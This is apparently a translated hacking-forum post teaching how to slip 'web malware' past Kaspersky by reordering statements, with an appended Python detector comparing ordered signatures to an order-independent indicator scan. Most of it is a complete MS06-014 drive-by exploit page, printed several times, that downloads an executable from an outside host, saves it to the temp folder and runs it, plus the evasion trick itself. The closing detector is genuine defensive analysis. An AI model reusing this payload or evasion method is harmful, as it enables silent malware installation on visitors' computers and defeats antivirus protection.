There are generally two ways to get web malware (网马) past antivirus: one is encoding or encryption (Microsoft's own Script Encoder works, and a hand-written encode/decode routine works better), the other is locating the signature the scanner keys on (a string, or a particular order of statements) and breaking it. A friend said his web malware was being caught by Kaspersky and did not know what to do, so here I use MS06-014 (the MDAC RDS.DataSpace vulnerability) as an example to pass on a small trick. The original code:
<html>
<script language="VBScript">
on error resume next
dl = "http://www.baidu.com/go.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
a1 = "Ado"
a2 = "db."
a3 = "Str"
a4 = "eam"
str1 = a1 & a2 & a3 & a4
str5 = str1
Set S = df.createobject(str5, "")
S.type = 1
str6 = "GET"
x.Open str6, dl, False
x.Send
fname1 = "g0ld.com"
Set F = df.createobject("Scripting.FileSystemObject", "")
Set tmp = F.GetSpecialFolder(2)
fname1 = F.BuildPath(tmp, fname1)
S.open
S.write x.responseBody
S.savetofile fname1, 2
S.close
Set Q = df.createobject("Shell.Application", "")
Q.ShellExecute fname1, "", "", "open", 0
</script>
<head>
<title>Oh, my god!</title>
</head>
<body>
<center>You DO it!</center>
</body>
</html>
After the evasion change:
<html>
<script language="VBScript">
on error resume next
dl = "http://www.baidu.com/go.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
a1 = "Ado"
a2 = "db."
a3 = "Str"
a4 = "eam"
str1 = a1 & a2 & a3 & a4
str5 = str1
Set S = df.createobject(str5, "")
S.type = 1
str6 = "GET"
x.Open str6, dl, False
x.Send
fname1 = "g0ld.com"
Set F = df.createobject("Scripting.FileSystemObject", "")
Set tmp = F.GetSpecialFolder(2)
S.open
fname1 = F.BuildPath(tmp, fname1)
S.write x.responseBody
S.savetofile fname1, 2
S.close
Set Q = df.createobject("Shell.Application", "")
Q.ShellExecute fname1, "", "", "open", 0
</script>
<head>
<title>Oh, my god!</title>
</head>
<body>
<center>You DO it!</center>
</body>
</html>
Look closely: all I did was move the S.open statement in front of fname1 = F.BuildPath(tmp, fname1), and that alone was enough to evade detection. This defeats Kaspersky's file-stream signature, which evidently matched on a fixed sequence of statements (BuildPath, then S.open, then S.write x.responseBody). Of course, when moving statements you have to mind what each one does in the code, or it will break; the move is safe here only because S.open does not depend on fname1, and fname1 is not used again until S.savetofile. Note also that the reordering leaves every download-and-execute indicator in place (the RDS.DataSpace CLSID, the "Adodb.Stream" string assembled from fragments, Microsoft.XMLHTTP, Scripting.FileSystemObject, Shell.Application, responseBody, savetofile, ShellExecute), so a scanner that matches on those regardless of statement order is not fooled by this trick.
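To make the point concrete, here is an added example (not code from the original post) that contrasts the two detection approaches. It runs an ordered "file stream" signature of the kind the reordering defeats, and an order-independent indicator scan that also folds VBScript string fragments back together so that "Adodb.Stream" is visible even though it never appears as a literal. The two samples are the VBScript bodies of the variants above, embedded as constructed test input; the exact regex used for the ordered signature is an assumption about what such a signature looks like, not Kaspersky's actual rule.

```python
import re

# Added example: ordered signature vs. order-independent indicator scan for the
# MS06-014 download-and-execute pattern. The ordered regex below is an assumed
# stand-in for a vendor's "file stream" signature, not the real rule.

# CLSID of RDS.DataSpace, the MDAC control abused by MS06-014 exploits.
RDS_DATASPACE_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"

# Constructed sample: the VBScript body of the original variant in the post.
ORIGINAL_VARIANT = '''
on error resume next
dl = "http://www.baidu.com/go.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
a1 = "Ado"
a2 = "db."
a3 = "Str"
a4 = "eam"
str1 = a1 & a2 & a3 & a4
str5 = str1
Set S = df.createobject(str5, "")
S.type = 1
str6 = "GET"
x.Open str6, dl, False
x.Send
fname1 = "g0ld.com"
Set F = df.createobject("Scripting.FileSystemObject", "")
Set tmp = F.GetSpecialFolder(2)
fname1 = F.BuildPath(tmp, fname1)
S.open
S.write x.responseBody
S.savetofile fname1, 2
S.close
Set Q = df.createobject("Shell.Application", "")
Q.ShellExecute fname1, "", "", "open", 0
'''

# The "evaded" variant from the post: S.open moved one statement earlier.
REORDERED_VARIANT = ORIGINAL_VARIANT.replace(
    "fname1 = F.BuildPath(tmp, fname1)\nS.open\n",
    "S.open\nfname1 = F.BuildPath(tmp, fname1)\n",
)

# Indicators checked without regard to statement order (all lower-case).
INDICATORS = {
    "rds_dataspace_clsid": RDS_DATASPACE_CLSID,
    "xmlhttp": "microsoft.xmlhttp",
    "adodb_stream": "adodb.stream",
    "filesystemobject": "scripting.filesystemobject",
    "shell_application": "shell.application",
    "responsebody": ".responsebody",
    "savetofile": ".savetofile",
    "shellexecute": ".shellexecute",
}

# Plain assignment "name = rhs" (object assignments start with "Set ", so they
# do not match; method calls like "S.type = 1" do not match either).
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')


def squash(script):
    """Lower-case the script and collapse all whitespace to single spaces."""
    return re.sub(r"\s+", " ", script).lower()


def fold_strings(script):
    """Resolve VBScript string constants built from literals and &-concatenation.

    Returns {name: value} for every variable whose value is fully known at
    parse time. Literals containing '&' are not handled (not needed here).
    """
    consts = {}
    for line in script.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.group(1).lower(), m.group(2)
        value = ""
        for part in (p.strip() for p in rhs.split("&")):
            if len(part) >= 2 and part[0] == '"' and part[-1] == '"':
                value += part[1:-1]
            elif part.lower() in consts:
                value += consts[part.lower()]
            else:
                value = None  # calls like F.BuildPath(...) are not constants
                break
        if value is not None:
            consts[name] = value
    return consts


def ordered_signature(script):
    """Assumed sequence signature: BuildPath(...) then .open then .write ... responseBody."""
    pattern = r"buildpath\([^)]*\) \w+\.open \w+\.write \w+\.responsebody"
    return re.search(pattern, squash(script)) is not None


def indicator_scan(script, min_hits=5):
    """Order-independent scan over the squashed script plus folded constants."""
    folded = " ".join(fold_strings(script).values()).lower()
    text = squash(script) + " " + folded
    hits = sorted(name for name, needle in INDICATORS.items() if needle in text)
    malicious = RDS_DATASPACE_CLSID in text and len(hits) >= min_hits
    return {"hits": hits, "malicious": malicious}


if __name__ == "__main__":
    for label, sample in (("original", ORIGINAL_VARIANT), ("reordered", REORDERED_VARIANT)):
        print(label, "ordered signature:", ordered_signature(sample))
        print(label, "indicator scan:", indicator_scan(sample))
```

The ordered signature fires on the original and misses the reordered copy, exactly the effect described above; the indicator scan flags both, because none of the objects, methods or the CLSID changed, and folding `a1 & a2 & a3 & a4` recovers "Adodb.Stream" that the fragment split was meant to hide.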